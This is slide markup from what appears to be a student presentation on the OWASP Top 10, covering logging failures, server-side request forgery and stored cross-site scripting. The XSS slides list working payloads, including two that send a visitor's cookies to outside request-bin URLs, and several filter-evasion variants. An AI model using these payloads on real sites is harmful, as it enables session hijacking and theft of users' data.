                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-778 Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p35"/>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Ensure all login, access control, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts and held for enough time to allow delayed forensic analysis.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure that logs are generated in a format that log management solutions can easily consume.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure log data is encoded correctly to prevent injections or attacks on the logging or monitoring systems.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Ensure high-value transactions have an audit trail with integrity controls to prevent tampering or deletion, such as append-only database tables or similar.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>DevSecOps teams should establish effective monitoring and alerting such that suspicious activities are detected and responded to quickly.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Establish or adopt an incident response and recovery plan, such as National Institute of Standards and Technology (NIST) 800-61r2 or later.</a:t>
            </a:r>
            <a:endParaRPr sz="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Server-Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;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Server-side request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>forgery flaws occur when a web application fetches remote resources without validating a user-supplied URL. An attacker can coerce the application to send a malicious request to an unexpected destination, even if there is a firewall, VPN, or another type of access control.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Server-Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8653975" y="0"/>
            <a:ext cx="4899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solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Google Shape;239;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482800" y="3126500"/>
            <a:ext cx="6178400" cy="185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20"/>
              <a:t>CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Server-Side Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2220"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2220"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p37"/>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CWE-918 Server-Side Request Forgery (SSRF)</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p37"/>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0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>From Network layer</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Segment remote resource access functionality in separate networks to reduce the impact of SSRF</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Enforce “deny by default” firewall policies or network access control rules to block all but essential intranet traffic.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Hints:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>~ Establish an ownership and a lifecycle for firewall rules based on applications.</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>~ Log all accepted and blocked network flows on firewalls (see A09:2021-Security Logging and Monitoring Failures).</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From Application layer:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Sanitize and validate all client-supplied input data</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Enforce the URL schema, port, and destination with a positive allow list</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Do not send raw responses to clients</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Disable HTTP redirections</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Be aware of the URL consistency to avoid attacks such as DNS rebinding and “time of check, time of use” (TOCTOU) race conditions</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Do not mitigate SSRF via the use of a deny list or regular expression. Attackers have payload lists, tools, and skills to bypass deny lists.</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Additional Measures to consider:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>Don't deploy other security relevant services on front systems (e.g. OpenID). Control local traffic on these systems (e.g. localhost)</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-266700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>For frontends with dedicated and manageable user groups use network encryption (e.g. VPNs) on independent systems to consider very high protection needs</a:t>
            </a:r>
            <a:endParaRPr sz="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My </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Vulnerability Reports</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;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GitHub Link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/Burchonator/InStep/blob/main/week4-reports/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>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Cross-site scripting (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>) Stored</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;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Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> arises when an application receives data from an untrusted source and stores that data within the application for other users to see.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> allows the attacker to inject malicious payloads which is stored on a web page and every user who visits that webpage runs they payload. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This vulnerability can result in worms, session hijacking, identity theft, denial of service attacks, website vandalism, theft of sensitive information, and financial fraud.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;script&gt;alert()&lt;/script&gt; // displays an alert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;script&gt;window.location = 'https://en0znfd3iuaxh.x.pipedream.net?cookie=' + document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> // sends the user cookies to the url</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;script&gt;upvote()&lt;/script&gt; // uses a function called upvote on the comment to boost the comment each time the comment is viewed.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of XSS Stored</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;26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Spreading worms on social media sites</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Session hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identity theft</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Denial of service attacks and website vandalism</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Theft of sensitive data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Financial fraud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XSS Stored Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;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b="1" lang="en"/>
              <a:t>&lt;script&gt;alert(document.cookie);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;Script&gt;alert(document.cookie);&lt;/Script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;script &gt;alert(document.cookie)&lt;/script &gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;sCriPt&gt;alert("XSS");&lt;/sCriPt&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;a onmouseover="alert(document.cookie)"&gt;xxs link&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;svg/onload="alert(document.cookie)"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;img src=404 onerror="alert(document.cookie)"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>// this command loads the src but will run on repeat unless the remove attribute is included.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;img src=x onerror="this.src='https://enplta38m1nbs.x.pipedream.net?cookie='+document.cookie; this.removeAttribute('onerror');"&gt;&lt;/img&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>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Top 10</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Broken Access Controls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cryptographic Failures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insecure Design</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerable and Outdated Components</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and Authentication Failures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Software and Data Integrity Failures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security Logging and Monitoring Failures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Server-Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Google Shape;80;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5308175" y="-3"/>
            <a:ext cx="3835825" cy="1334850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
